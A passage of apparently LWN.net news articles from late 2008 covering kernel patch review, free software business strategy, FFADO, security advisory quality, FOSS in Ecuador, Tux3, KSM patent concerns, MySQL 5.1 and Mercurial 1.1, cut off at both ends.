	This driver allows to create a distributed storage block device.


You owe your users a little bit more than that.  Why might they want to use
DST?  Where can they get the associated tools?  This, too, is a fatal error
for any substantive kernel change.

And, while we're still somewhat on the subject of reviews: Andrew naturally
called out the generic-looking thread pool implementation buried deep
within DST; shouldn't it pulled out and made more generic?  Your response can be paraphrased as "I can't be
bothered to get the API past the review process, which, in any case, is
biased toward those who are 'closer to the high end'."  But pulling out
this code and 
merging it separately might be the ideal starting point for getting the
larger patch set into the kernel.  A generic thread pool hiding within a
storage device driver, instead, will be an ongoing impediment to
inclusion.

Then there is the issue of motivation: why should the kernel developers
want to merge this patch?  Who are the users of it - do you have users now?
How does it compare to other distributed storage technologies already in
the kernel?  What's the performance like - can you post some benchmark
results?  As it stands, DST looks like a nice piece of technology, but its
benefits are still unclear.  Tell that story, and the level of interest may
well go up.

Finally, your editor would like to counsel patience.  Some patches just
take longer than others to find their way in the kernel.  That is
especially true of complex patches which touch on issues like memory
management and which add new user-space ABIs.  As a close-to-home example,
look at David Howells's FS-Cache 
code, recently reposted for
consideration.  The first LWN
article on this code was published more than four years ago.  David is
probably getting a little tired of maintaining this code out-of-tree, but
he sticks with it, responds to reviews, and appears to be getting closer to
inclusion.

Evgeniy, you appear to be a brilliant and productive hacker.  You charge
into places that scare off most kernel developers, and you always come back
out with something interesting.  We need developers like you.  But
we need developers like you who can work with the process - no matter how
frustrating it gets.  The kernel process is certainly far from perfect, but
it is built around a set of principles which have served us well for many
years.  You could easily rise up through that process to become one of the
"high end" developers who, you say, have an easier time getting code
merged.  Or you could take your marbles and storm home, making snide
comments about reviewers on the way.  But that would not be good
for anybody involved.

(See also: Evgeniy's response
to this article.)

		ELCE: Free software strategies for business


Shane Coughlan, legal coordinator for the Free Software Foundation Europe
(FSFE), spoke about the advantages of free software from a business
perspective at the recent Embedded
Linux Conference Europe.  His talk was not necessarily directed at his
audience—as most were already free software users—but, instead,
at the bosses of his audience, the
management of companies using or considering using free software.  His
approach was to use the language that management understands while making a
strong case for the value that free software can bring.


Coughlan noted the obligatory analyst projections, including 4% of
European GDP coming from free software by 2010 as well as 80% of
commercial software projected to contain free software by 2011.  These are
eye-opening numbers, so Coughlan went on to explain why those numbers are
that high.
Businesses are created to deliver value to their investors; in order to
succeed, they will need to "deliver value now and deliver more value
later and that's how you are going 
to run a successful business".  A short-term outlook is not going to
deliver real success.  Paraphrasing Bill Clinton, he said "it's for
the long term, stupid".


Proprietary software allows businesses to "do some stuff", but
free software allows them to "do more stuff".  As
Coughlan describes it, the correct approach is for a business to "do
more and keep doing it"; using free software makes that easier.
"From a business perspective, free software rocks."


The key to free software is not in the cost nor is it in the availability of
source code, he said, as those do not embody the freedoms that are
important.  The ability to "use, study, share, and improve",
known as the four freedoms, are what gives free software its edge.  They
allow for more 
flexibility and growth than other kinds of software, he said.


If free software has so many upsides, what's the
catch?  "Free software is powered by licenses", so businesses
need to understand those licenses and, just as importantly, the reasoning
behind those licenses.  This is no different than any other license, but a
common problem is that people don't read the licenses or follow the terms.
If they do, there is no problem, though. So, there is a catch, but
"the catch isn't too big". 


A business must apply some management science to determine its strategy:
whether to use an existing solution or work on building a new one.  If it
decides to build something new, does it foster some kind of community model
or not?  These are the kinds of questions that need to be answered as part
of determining a free software strategy.


Communication with people in the community is important as is choosing
licenses that are popular and compatible.  There are ways to reduce any
risk associated with free software by using existing best practices.  That
means pro-actively resolving issues, not just putting free software into a
product, then "pray, and be upset when someone tells us we were
naughty". 


One of the resources available to help management is the FSFE's Freedom Task Force (FTF) which is
set up to assist everyone in understanding free software licensing.  The
FTF does training and consulting for businesses to help with
licensing or other issues.  If one is having trouble getting management
on-board, refer them to FTF, "we won't actually lock them up and
brainwash them", Coughlan said.


While companies are resistant to releasing their code, "if you're
doing your marketing right and you're not relying on temporary monopolies,
you can probably release quite a lot" of code without any business
harm.  It has been estimated that the body of free software is "worth" $12
billion, so a company can reimplement it, "at an estimated cost of
$12 billion, or you can share your $2-3 million [investment] and use the
code".   It's a matter of recognizing the immense benefits that come
with free software.


Coughlan also described a legal network that the FTF is fostering in
Europe, where lawyers and legal experts can discuss issues of importance to
free software, especially across jurisdictional boundaries.  That network
can help provide businesses with legal information to help reduce risks.
There is, as
yet, no US equivalent, though some US lawyers are participating with the
European network. "Still, I'm confident that eventually the US will
catch up with us", he said.


He wrapped up with some thoughts on the GPLv3, noting that "adoption
in the first year has been very, very promising".  In fact, it has
been adopted faster than he expected.  He did note that there are some
problems with license incompatibilities, but that those are probably
unavoidable.  The ideal situation would be for every license to be able to
work with every other, but it doesn't work that way, which is a bit of an
inconvenience, but not really a problem at this point.


Coughlan did not really say very much that LWN readers won't have
heard before, but he did put it together in a way that should resonate with
businesspeople.  It was also interesting to get a look at what FSFE, and
particularly FTF, are up to.  There is a lot of important free software
work, completely separate from development, going on in Europe.
Because I am US-based—hopefully not too US-biased—that
sometimes gets overlooked, so it was very nice to have a chance to hear about
that work.


		FFADO approaches the 2.0 release


The FFADO
(Free Firewire Audio Drivers) project allows the support of
FireWire
(IEEE 1394) audio devices under Linux:


The FFADO project aims to provide a generic, open-source solution for the support of FireWire based audio devices for the Linux platform. It is the successor of the
FreeBoB
project.
FFADO is a volunteer-based community effort, trying to provide Linux with at least the same level of functionality that is present on the other operating systems. It is a work in progress, we are close, but we are not quite there yet.


The
About document explains
further:
"We try to support any FireWire device available out there. The FFADO codebase is a framework that has been built with this in mind. This however doesn't mean that all FireWire devices work with FFADO. In order to support a device, we need cooperation from manufacturers, or somebody that want[]s to reverse engineer the protocol.
Luckily we have support from the manufacturers of the three major platforms vendors build their devices around (BridgeCo, TC Applied Technologies and ECHO). The exact devices supported (or not supported) can be found on our

device list."


Release candidate 1 of FFADO 2.0 was
announced
this week:
"This release candidate is intended to collect feedback about
the library under wide-spread usage. The code should be free of major
bugs. We are looking for packagers that are interested in creating
packages for their favorite distribution. Please contact us if you
can help us out with this."
Users of FreeBoB are encouraged to try this release out.


The full
change Log
shows the latest changes to the software, most of the work involves
bug fixing.  The feature list is also found there.
Capabilities include:

Support for an unlimited number of 24-bit audio I/O channels.
 Support for all device sample rates.
 Support for an unlimited number of MIDI I/O channels.
 Support for the S/PDIF audio interface format.
 Support for the ADAT SMUX I/O format.
 Support for external synchronization.
 Support for internal mixers and other device controls.
 Support for device aggregation on an externally synced bus.


The project
documentation
has more information.
The installation notes
from the FAQ pages explain how the various components of the software
work together.


If your favorite application requires FireWire support, or you need
to migrate away from the unsupported FreeBoB library, now would be a
good time to give FFADO a try.


		Distribution advisories


Here at LWN, we get a chance to see a fair number of security advisories in
the course of a week—sometimes even in just a single day—so we tend to
notice the quality, or lack thereof, of these important announcements.
There are a few important pieces of information that need to be a
part of any security update announcement, but sadly sometimes they aren't
included.  Overall, the quality of advisories seems to be declining, which
is something that we would like to see change.  While it clearly would make
collecting security advisories easier for us, that is not the primary
motivation for this look at security reporting—users are not being
well-served by the current state of affairs.


Distributions need to remember that the audience for their security
announcements is their users.  Those users require some basic information
to make an informed choice about whether they need to apply the update as
well as how urgently.  In order to make those decisions, the following
should be present in advisories:

the package affected
the problem that is being fixed
the impact of the vulnerability
some kind of unique identifier for the alert
links to relevant additional information (CVE,
bugzilla, ...)
where and how to update the package
consistent formatting of advisories is a definite plus

Users are not as familiar with either the package or the distribution as
the person writing the alert is, so it should be written with that in
mind.  The most important thing is to concisely communicate the severity
and urgency of the problem in a way that the reader can
understand—and figure out what to do about it.


The biggest problem seen with alerts of late is a lack of information about
the problem they are fixing.  As an example, consider the recent Fedora advisory on kvm.  It
refers to a recent CVE number (CVE-2008-4539)
which is "reserved", but no details are present, and says that it fixes a
"cirrus vulnerability".  It also references a bugzilla
entry that apparently addresses a separate CVE from 2007 (CVE-2007-1320),
if you follow that link in
the bugzilla, you finally end up somewhere with actual information, though
the connection between the two problems is not particularly obvious.


Another example of this is CentOS advisories, which suffer from a number of
problems, but the most vexing for folks trying to determine whether they
need to update is this lack of bug information.  It is not all that hard to
get the information as a typical
alert has a link to the appropriate Red Hat advisory, but why make
users take that step?  A concise summary of the bug(s), as well as a
reference to the—generally very complete—Red Hat errata, would
be quite useful.  There is certainly nothing wrong with linking to sources
of additional information, but the basics of the problem and its impact
should be available in the alert. 


Unique identifiers for advisories are useful for a number of reasons:
keeping track of which have been addressed, having a unique search string to
use, or referring to them in conversations, bug reports, etc.  When the
identifier is not unique, it muddies the waters a bit, making it more
difficult than it needs to be.  Sometimes mistakes are made (like the spate
of recent Fedora alerts with the same FEDORA-2008-10000 identifier), but
there appear to be distribution policies about using identifiers multiple times.
CentOS uses the same identifier on multiple advisories, one per
architecture, but also shared between CentOS releases.  So the same
identifier will be applied to an s390 update for CentOS 4 as is applied to
x86_64 for CentOS 5.


Another identifier reuse problem comes from Fedora.  When mozilla (or more
recently xulrunner) library vulnerabilities occur, Fedora pro-actively
rebuilds and updates all of the packages that depend on those libraries.
This is very much to its credit as the API is not (yet) stable, but all of
the resulting alerts refer to the same identifier.  For those who try to
track vulnerabilities along with alerts, that results in messy listings that don't
provide much in the way of helpful information.  Other library bugs result
in much saner listings where
one could relatively easily track down—and keep straight—the
advisories for various packages.


There are others problems as well. Alerts that combine unrelated
fixes do "avoid flooding mailing lists", but they are a bit painful to
tease apart for users that are tracking specific packages.  Too much
history, in the form of changelogs (example) can also be confusing.
If there is only a link to provide vulnerability information, as is the
CentOS way, it 
should probably go directly to a page about the flaw, not to some page that
lists all recent upstream flaws (example).  And on and on.


Certain distributions have been singled out here, but that is not really
the point.  These are just recent examples of problems that are regularly
seen in distribution security alerts.  It should be noted that the
commercial distributions (SUSE, Ubuntu, Red Hat, Mandriva) seem to do a
much better job overall, which is not surprising, but sometimes they fail
as well.  The key thing to remember is that security announcements are
meant to be read by users and acted upon.  If information is lacking, the
communication will fail. 


This is not the first time we have looked at the problem, way back in 2000
security page editor Liz Coolbaugh took a look at security
advisories, and had some of the same complaints seen here.  Her
conclusion is still valid: it is not that distributions are not trying or
that they don't care, but at times the contents of their advisories slip
below the radar.  After her article, things got better with security
alerts, hopefully this gentle prodding will have a similar effect.


		A look at free software in Ecuador


I recently spoke at the Congress on Free
Software and Democratization of Knowledge hosted in Quito by the
Universidad Politecnica Salesiana of Ecuador. My general report about the
conference and Free as in Freedom knowledge in that country is at the P2P
Foundation blog: the trip, however, was also an excellent occasion to
check out the most interesting Free Software projects currently taking
place in Ecuador. It turns out that there is a lot of activity at the
Government level to promote Free Software, and interesting news from some
cool projects developed locally. 

FOSS in the Government

A recent presidential decree mandates that most national Public
Administrations migrate entirely to Free Software. Ing. Mario Albuja, head
of the Subsecretariat for Information Technology of the Presidency of
Ecuador, explained during the congress the reasons and the general
guidelines of this initiative. Later on, I was able to get more details in
a couple of meetings with the members of his staff. Among the most
important things going on right now there are the studies and tests for a
Government digital signatures application which runs on Gnu/Linux and a
unified document management system for 45 central Public
Administrations. There is also a field trial of the GPL hospital management
software Care2X in the works.


The initial implementation of the digital signature project, which uses
Free Software whenever possible, is based on keys and digital certificates
stored on SafeNet iKey 2032 USB
tokens from Entrust. The first official field test will take place in
the next weeks, when President Correa himself will use one such key to sign
a decree. The Certificate Authority infrastructure which will issue keys
and certificates is the same implemented
by Banco Central del Ecuador in November 2007.


The software application, instead, runs inside any browser. A PostgreSQL
backend stores all the documents, together with administrative metadata, on
a CentOS-based server. The decrees waiting for electronic signature are
presented to the user via a simple Apache/PHP front-end. The actual digital
signature happens through a Java applet which reads the encrypted key from
the USB token thanks to libraries provided by Entrust.


Another big step in the process of freeing Ecuador institutions from
proprietary software will be the formal ratification of OpenDocument 1.0 by
the Ecuadorian Institute of Standards
(INEN). Large-scale usage of this format for public documents
should take off right after that, around mid-2009.


All the public officials I talked with really believe in the potential of
Free Software for a developing country like Ecuador. This only makes more
relevant, and worthy of careful consideration, a comment I got from them:

there, they say, is no coordination or common vision among the developers
of the 
several FOSS applications they need to deploy. This was no surprise, of
course: people at the Subsecretariat understand how FOSS development
works. Nevertheless, the fact that there is no unified, local, reliable
source for support, with predictable, if not guaranteed, response times, is
creating them more problems than they expected when they began. There may
be quite a business opportunity here for local FOSS entrepreneurs.


Talking with hackers

Rafael Bonifaz told me what's
new in the Elastix world. In case you never heard of it, Elastix is a specialized GNU/Linux
distribution born and (mostly) developed in Ecuador. Its goal is
to solve all the communication problems of organizations of any
size. Elastix integrates in one easy to administer package all you need to
have PBX, VoIP, email, instant messaging, fax and fax/email gateway through
Asterisk, Hylafax, Postfix and Openfire
for Jabber. You can manage all the PBX functions with a customized
version of freepbx. Other tools
developed by the Elastix team provide hardware detection, centralized
automatic configuration of phones and billing support with a2billing.


Elastix is doing great in Ecuador: RTS and Aerolineas
Galapagos (Aerogal), which are respectively one of the most important
TV channels and one of the main domestic airlines in Ecuador, are using
it. Namely, Aerogal is running its call center off Elastix, which is being
deployed also in the Ministry of Public Health.


Rafael, who is the current coordinator of the Elastix Community, is also
proud of the fact that Elastix is the only Gnu/Linux distribution for
communications which has two manual books, totaling about five hundred
pages, freely downloadable from the Internet: Elastix
Without Tears [PDF] by Ben Sharif and Unified
communications with Elastix [PDF] by Edgar Landivar. The second manual is
still a beta version, currently available only in Spanish. There already
is, however, a new mailing list
devoted to coordinating all the translation efforts for this second
book.


Still thanks to Rafael, after knowing about Elastix I met a local group of
Java developers who have very recently begun developing a new, interesting
content management system called Melenti.
Adrian Cadena, member of the Melenti team, explained to me that he and his
partners needed a GPL, friendly, easy to use and fast CMS that
could scale well from personal web pages to corporate portals. Another must
on their requirement list was ease of integration with enterprise software
(Java or not) for ERP, CRM and SAP services. That's why, three months ago,
after some unsatisfactory experiences with the popular Joomla CMS they started writing Melenti.


One of the main features of Melenti should be performance under high
loads. Adrian said they are aiming for something able to handle hundreds of
thousands of clicks per second, something which Joomla "simply could not
handle, when we tried it". Melenti administrators, instead, would be
able to configure load balancing without problems, thanks to an interface
based on Jndi
and other tools.


Melenti should run on any JEE infrastructure, from Websphere to JBoss, BEA,
Oracle AS, Tomcat, Jetty and more. According to Adrian, Melenti will also
be much simpler to set up and extend than most other GPL software for
Content Management.

Installation should be as simple as dropping a .war file into your flavor
of JEE container and following the steps of the graphical wizard which will
pop up. Writing Melenti "gadgets", that is plugins, should also be easier
than with Joomla, Drupal, Php-nuke and similar products. This because, says
Adrian, "unlike those products, Java has worldwide standards like
Spring, JPA, JSF, GWT and so on: new developers can just take a look at the
core Melenti API and start writing their own gadgets in no time."


The first releases of Melenti will support basic CMS functions like
management of web pages, images and other files. There will be also
interfaces for banner rotation, creation of user polls and a Web Services
Creator. The latter is a simple wizard to create Web Services from existing
Melenti gadgets. The first alpha version of Melenti
has been just uploaded to Sourceforge. You're obviously welcome to have
a look at the code and to participate in the development of Melenti.


Let's go back to the reason why I went to Quito now, that is Free Software
and Democratization of Knowledge. Quiliro Ordonez, with one friend
and other occasional volunteers, is now implementing in the field a project
first announced
in 2007: placing Free Software in a school of the community of
Quilapungo, south of Quito, which serves about 200 students.
Thus far, Quiliro has installed 2 servers and 4 thin clients running
gNewSense. He chose this
distribution because it is "100% free software, without non-free
repositories or blobs in the kernel which promote functionality before
anything else, as this would weaken our position for freedom." He's
also very happy with TCOS, which
made setting up the thin clients a breeze.  The school staff will use Projecto Alba, a modular
administration and planning software for schools first developed in
Argentina. While gNewSense worked fine out of the box, Quiliro and his
partners had to localize Alba to adapt it to the terminology and procedures
adapted in Ecuadorian schools.


Eventually, the school in Quilapungo will have about 40 Gnu/Linux
workstations, but Quiliro doesn't plan to stop there. If all goes well,
Quilapungo will be presented as a pilot project in a proposal for Free
Software deployment in all public schools in Ecuador. Let's wish Quiliro
good luck!


		Tux3: the other next-generation filesystem


There is a great deal of activity around Linux filesystems currently.  Of
the many ongoing efforts, two receive the most attention: ext4, the
extension of ext3 expected to keep that filesystem design going for a few
more years, and btrfs, which is seen by many as the long-term filesystem of
the future.  But there is another project out there which is moving quickly
and is worth a look: Daniel Phillips's Tux3 filesystem.

Daniel is not a newcomer to filesystem development.  His Tux2 filesystem was
announced in 2000; it attracted a fair amount of interest until it turned out that
Network Appliance, Inc. held patents on a number of techniques used in
Tux2.  There was some talk of filing for defensive patents, and Jeff Merkey
popped
up for long enough to claim to have hired a patent attorney to help
with the situation.  What really happened is that Tux2 simply faded from
view.
Tux3 is built on some of the same ideas as Tux2, but many of those ideas
have evolved over the eight intervening years.  The new filesystem, one
hopes, has changed enough to avoid the attention of NetApp, which has shown
a willingness to use software patents to defend its filesystem turf.


Like any self-respecting contemporary filesystem, Tux3 is based on
B-trees.  The inode table is such a tree; each file stored within is also a
B-tree of blocks.  Blocks are mapped using extents, of course - another
obligatory feature for new filesystems.  Most of the expected features are
present.  In many ways, Tux3 looks like yet another POSIX-style filesystem,
but there are some interesting differences.


Tux3 implements transactions through a forward-logging mechanism.  A set of
changes to the filesystem will be batched together into a "phase," which is
then written to the journal.  Once the phase is committed to the journal,
the transaction is considered to be safely completed.  At some future time,
the filesystem code will "roll up" the journal changes and write them back
to the static version of the filesystem.

The logging implementation is interesting.  Tux3 uses a variant of the
copy-on-write mechanism employed by Btrfs; it will not allow any filesystem
block to be overwritten in place.  So writing to a block within a file will
cause a new block to be allocated, with the new data written there.  That,
in turn, will require that the filesystem data structure which maps
file-logical blocks to physical blocks (the extent) will need to be changed
to reflect the new block location.  Tux3
handles this by writing the new blocks directly to their final location,
then putting a "promise" 
to update the metadata block into the log.  At roll-up time, that promise
will be fulfilled through the allocation of a new block and, if necessary,
the logging of a promise to change the next-higher block in the tree.  In
this way, changes to files propagate up through the filesystem one step at
a time, without the need to make a recursive, all-at-once change.

The end result is that the results of a specific change can remain in the
log for some time.  In Tux3, the log can be thought of as an integral part
of the filesystem's metadata.  This is true to the point that Tux3 doesn't
even bother to roll up the log when the filesystem is unmounted; it just
initializes its state from the log when the next mount happens.  Among
other things, Daniel says, this approach ensures that the journal recovery
code will be well-tested and robust - it will be exercised at every
filesystem mount.


In most filesystems, on-disk inodes are fixed-size objects.  In Tux3,
instead, their size will be variable.  Inodes are essentially containers
for attributes; in Tux3, normal filesystem data and extended attributes are
treated in almost the same way.  So an inode with more attributes will be
larger.  Extended attributes are compressed through the use of an "atom
table" which remaps attribute names onto small integers.  Filesystems with
extended attributes tend to have large numbers of files using attributes
with a small number of names, so the space savings across an entire
filesystem could be significant.

Also counted among a file's attributes are the blocks where the data is
stored.  The Tux3 design envisions a number of different ways in which file
blocks can be tracked.  A B-tree of extents is a common solution to this
problem, but its benefits are generally seen with larger files.  For
smaller files - still the majority of files on a typical Linux system - data can be
stored either directly in the inode or at the other end of a simple block
pointer.  Those representations are more compact for small files, and they
provide quicker data access as well.  For the moment, though, only extents
are implemented.


Another interesting - but unimplemented - idea for Tux3 is the concept of
versioned pointers.  The
btrfs filesystem implements snapshots by retaining a copy of the entire
filesystem tree; one of these copies exists for every snapshot.  The
copy-on-write mechanism in btrfs ensures that those snapshots share data
which has not been changed, so it is not as bad as it sounds.  Tux3 plans
to take a different approach to the problem; it will keep a single copy of
the filesystem tree, but keep track of different versions of blocks (or
extents, really) within that tree.  So the versioning information is stored
in the leaves of the tree, rather than at the top.
But the versioned extents idea has been deferred for now, in favor of getting
a working filesystem together.


Also removed from the initial feature list is support for subvolumes.  This
feature initially seemed like an easy thing to do, but interaction with
fsync() proved hard.  So Daniel finally concluded that volume management was best left
to volume managers and dropped the subvolume feature from Tux3.


One feature which has never been on the list is checksumming of data.
Daniel once commented:


	Having been checksumming filesystem data during continuous
	replication for two years now on multiple machines, and having
	caught exactly zero blocks of bad data passed as good in that time,
	I consider the spectre of disks passing bad data as good to be
	largely vendor FUD. That said, checksumming will likely appear in
	the feature list at some point, I just consider it a decoration,
	not an essential feature.


Tux3 development is far from the point where the developers can worry about
"decorations"; it remains, at this point, an embryonic project being pushed
by a developer with a bit of a reputation for bright ideas which never
quite reach completion.  The code, thus far, has been developed in user
space using FUSE.  There is, 
however, an in-kernel version
which is now ready for further development.  According to Daniel:


	The functionality we have today is roughly like a buggy Ext2 with
	missing features.  While it is very definitely not something you
	want to store your files on, this undeniably is Tux3 and
	demonstrates a lot of new design elements that I have described in
	some detail over the last few months.  The variable length inodes,
	the attribute packing, the btree design, the compact extent
	encoding and deduplication of extended attribute names are all
	working out really well.


The potential user community for a stripped-down ext2 with bugs is likely
to be relatively small.  But the Tux3 design just might have enough to
offer to make it a contender eventually.  

First, though, there are a few little
problems to solve.  At the top of the list, arguably, is the complete lack
of locking - locking being the rocks upon which other filesystem projects
have run badly aground.  The code needs some cleanups - little problems
like the almost complete lack of comments and the use of macros as formal
function parameters  are likely to raise red flags on wider review.  Work
on an fsck utility does not appear to have begun.  There has been no real
benchmarking work done; it will be interesting to see how Daniel can manage
the "never overwrite a block" policy in a way which does not fragment files
(and thus hurt performance) over time.  And so on.


That said, a lot of these problems could end up being resolved rather
quickly. Daniel has put the code out there and appears to have attracted an
energetic (if small) community of contributors.  Tux3 represents the core
of a new filesystem with some interesting ideas.  Code comments may be
scarce, but Daniel - never known as a tight-lipped developer - has posted a
wealth of information which can be found in the Tux3
mailing list archives.  Potential contributors should be aware of Daniel's licensing scheme - GPLv3 with a
reserved unilateral right to relicense the code to anything else - but
developers who are comfortable with that are likely to find an interesting
and fast-moving project to play in.

		KSM runs into patent trouble


On the kernel page a few weeks ago, we took a look at KSM, a technique to
reduce memory usage by sharing identical pages.  Currently proposed for
inclusion in the mainline kernel, KSM implements a potentially
useful—but not particularly new—mechanism.  Unfortunately,
before it can be examined on its technical merits, it may run afoul of what
is essentially a political problem: software patents. 


The basic idea behind KSM is to find memory pages that have the same
contents, then arrange for one copy to be shared amongst the various
users.  The kernel does some of this already for things like shared
libraries, but there are numerous ways for identical pages to get created
that the kernel does not know about directly, thus cannot coalesce.
Examples include initialized memory (at startup or in caches) from
multiple copies of the same program and virtualized guests that are running
the same operating system and application programs. 


Unfortunately, as Dmitri Monakhov points out, the KSM technique
appears to be patented by
VMware.  A patent for "Content-based, transparent sharing of memory
units" was filed in July 2001 and granted in September 2004.  The abstract
seems to clearly cover the ideas behind KSM:
[...] The context, as opposed to merely
the addresses or page numbers, of virtual memory pages that [are]
accessible to 
one or more contexts are examined. If two or more context pages are
identical, then their memory mappings are changed to point to a single,
shared copy of the page in the hardware memory, thereby freeing the memory
space taken up by the redundant copies. The shared copy is ten preferable
[sic] 
marked copy-on-write. Sharing is preferably dynamic, whereby the presence
of redundant copies of pages is preferably determined by hashing page
contents and performing full content comparisons only when two or more
pages hash to the same key. 


It should be noted that the abstract has no legal bearing, that comes from
the—always tortuously worded—claims, which can be seen at the
link above.  In this case, as far as
can be determined, the claims and abstract are in close agreement.


The dates above are rather important because there is some "prior art" to
consider, namely the mergemem patch
first announced
in March of 1998.  It is substantially the same as the patented idea: it
looks for identical "context pages", then changes the memory mappings to
point to a single copy-on-write page.  This would seem to be a clear
example of the idea being implemented well before the patent was filed, so
it should invalidate the patent.  As with everything surrounding
software patents, though, it isn't as easy as that.


In order to invalidate a patent, either a court must rule that way or the
patent office must be convinced to re-examine it, then find that the prior
art makes it invalid.  Both of these methods
take time and usually money and lawyers as well.  Free software projects
may have time, but the other two are typically out of reach.  Alan Cox suggests that "perhaps the
Linux Foundation and 
some of the patent busters could take a look at mergemem and
re-examination".   While that might eventually resolve the problem,
it is a multi-year process at best.


The folks behind the KSM project are some of the kvm hackers from
Qumranet—which is now part of Red Hat.  It is certainly conceivable
that VMware might consider kvm a competitor and try to use this patent as a
"competitive" weapon.  That concern is probably enough to keep KSM out of
the mainline until the issue is resolved.


There is a much quicker resolution available should VMware wish to do so.
Like IBM has done with the RCU patent, VMware could license its patent for
use in GPL-licensed code.  There is much to be gained by doing that, at
least in terms of positive community relations, and there is little to be
lost—unless VMware truly believes that the patent will stand up to
scrutiny.  Both VMware and its parent, EMC, are members of the Linux
Foundation, so one could see a role for the foundation in helping to put
that kind of agreement together.


The original mergemem idea did not make into the kernel, but the code is
still available for those running Linux 2.2.9.  It appears that it was not
pushed very 
hard in the face of some security concerns—which will need to be
addressed by KSM as well.  Processes could create a page of memory with
known contents then, after waiting for the checker process (or kernel
thread) to run, see if memory usage has increased.  Based on that
information, one can determine if other processes have a page with
identical values.  It would seem rather difficult to exploit, but clearly
does allow some information to leak.


It will come as no surprise to most LWN readers that software patents are an
increasingly dense minefield that can derail free software projects.
Unfortunately, it is the kind of problem that has no solution in the
technical domain where such projects excel.  The political arena is where
any solution will have to come from, though there seems to be some hope
that judicial opinions (like the Bilski decision) may limit the scope of
the damage.  It is a problem that we are likely to see more frequently
until there is some kind of resolution.


		MySQL 5.1 and development models


The MySQL development team decided to celebrate the (US) Thanksgiving
holiday with the release of MySQL
5.1.30, the first "general availability" (read "production-ready")
release in the 5.1 series.  There is a lot of good stuff in 5.1.30,
including table partitioning, row-based replication, a new plugin API, a
built-in job scheduler, and more; see the
nutshell summary for more information.  It's a celebration point for a
long development series; the MySQL developers are to be congratulated for
what they have accomplished with this release.

Behind the celebration, though, one can hear the grumbling from unhappy
developers and users.  This release has been a long time in coming; the
first 5.0 GA release was in October, 2005 - just over three years ago.  The
first 5.1 release candidate (5.1.22) came out in September,
2007; seven more "release candidates," many with major changes, were
announced over the following 14 months.  So the 5.1 production release
came rather later than desired, but some developers feel that it was still to
soon; the complaints reached a climax in this
lengthy posting from Michael "Monty" Widenius, the original creator of
MySQL.  His point of view, in short, is that this release has fatal bugs,
and that these bugs come from a number of flaws in how MySQL development is
managed.

Your editor cannot claim to be an expert on the MySQL development
community.  But Monty, presumably, is an expert on this community,
so his observations have a higher than usual likelihood of reflecting
something close to reality.  Reading various dissenting posts (example)
has done little to make your editor feel otherwise. 
And, in any case, much of what Monty says rings true when compared against
experiences from elsewhere in the free software community.  As projects
grow, they must occasionally revisit their development models.  There is
little happening here which is truly unique to MySQL.

Monty asserts:


	MySQL 5.1 was declared beta and RC way too early. The reason MySQL
	5.1 was declared RC was not because we thought it was close to
	being GA, but because the MySQL manager in charge *wanted to get
	more people testing MySQL 5.1*. This didn't however help much,
	which is proved by the fact that it has taken us 14 months and 7
	RC's before we could do the current "GA". This caused problems for
	developers as MySQL developers have not been able to do any larger
	changes in the source code since February 2006! 


Two things jump out of that statement.  One is that MySQL apparently
suffers from an inadequate testing community.  Needless to say, that
is not a problem which is unique to this project; testing is a scarce
resource throughout our community.  MySQL users who are unhappy with the
results of the development process might want to ask themselves if they are
doing enough to help with the testing process.  Like it or not, testing
software and finding bugs is one of the costs of "free" (beer) software.
If this testing doesn't happen during the development cycle, it will end up
happening with the "stable" releases instead.

The other attention-getter above is the statement that MySQL developers
have been unable to make major changes since early 2006.  One need only
think back to the 2.4 kernel days to see the kind of damage that can result
from pent up "patch pressure."  Developers get frustrated, major changes
start to find their way into "release candidate" code, and the number of
bugs tends to increase.  The existence of a separate MySQL 6
development branch helps, perhaps, in reducing patch pressure, but it can
also only serve to distract developers from stabilizing current release
candidates.

Related to this is another assertion:


	Too many new developers without a thorough knowledge of the server
	have been put on the product trying to fix bugs. This in combined
	with a failing review process have introduced of a lot new bugs
	while trying to fix old bugs.


Review would appear to be a big part of the problem in general.  It may
well be that a failure of review has caused the introduction of new bugs
with fixes.  But one could argue that the problem is deeper than that: any
code which failed to stabilize over fourteen months of release candidates
should, almost certainly, never have been merged into the MySQL trunk to begin
with.  It seems that there are not enough eyeballs being applied to major
new features before they go in.  

Your editor has resisted the temptation to
make comparisons with other relational database manager projects, but
there is value in comparing this state of affairs with the review problems faced by
PostgreSQL in recent years.  An inability to get additions to
PostgreSQL properly 
reviewed resulted in those additions not being merged.  That, in turn,
leads to delayed releases with fewer than the desired number of features,
neither of which is particularly pleasing for users or developers.  But, on
the other hand, PostgreSQL does not appear to have the same kind of trouble
stabilizing its major releases.

Perhaps the key point to take away from all of this, though, is here:


	In addition, the MySQL current development model doesn't in
	practice allow the MySQL community to participate in the
	development of the MySQL server. 


MySQL is very much a corporate-owned, corporate-driven project, and it has
been for a long time.  Decisions on what to include are made internally;
there is little discussion of development decisions on the project's
mailing lists.  It is hard to find information on how to contribute to the
project; some
of the available information still tells prospective contributors to
use BitKeeper.  All code is copyrighted by MySQL (now Sun), which reserves
(and uses) a right to distribute that code under proprietary licenses.  


All of the above reflects an arrangement which has worked well for years,
and which has produced an immensely valuable database manager used
 by vast numbers of people.  But it is not a community
project, so development decisions will not necessarily reflect the best
interests of the wider user or developer communities.  If, as Monty suggests,
those decisions are made in ways which favor features and deadlines over
quality, there will be little that the community can do about it.

		Mercurial 1.1 - a major feature release


The 
Mercurial project is described as:
"a fast, lightweight Source Control Management system designed for efficient handling of very large distributed projects."
The

Major Features document presents an overview of Mercurial's
capabilities and
Understanding Mercurial
explains how Mercurial works as a distributed source control system.


Mercurial version 1.1 was
announced
this week:
"This is a major release with numerous new features."


The 
What's New document explains the many changes that were added to
Mercurial 1.1.
Highlights include a new resolve command for tracking in-progress
merges, a new repository format, performance improvements, support for
Python 2.6, bug fixes and work on the documentation.
The web interface now has a canvas-based repository graph, new themes,
improved WSGI compliance, support for the display of nested repositories
and other improvements.


The Mercurial commands have gone through numerous improvements and
extensions, some bugs have also been fixed.
Some new extensions have been added to Mercurial 1.1, including
a rebase extension for rebasing changesets, a bookmarks extension
for providing git-like branches, a zeroconf extension for publishing
repositories and an hgcia extension for communicating with
CIA.
Some of the existing extensions have undergone a variety of improvements.
Version 1.2 of the mercurial plugin for the
Eclipse IDE was also

announced this week.


According to

Wikipedia, Mercurial was started in 2005 and the software is
being used by such high profile projects as
Mozilla, OpenSolaris and Xen.  This latest release shows that
the code continues to undergo active development, and holds an important
place in the world of source code control systems.


		Debugfs and the making of a stable ABI


Remi Colinet recently proposed the addition
of a new virtual file, /proc/mempool, which would display the
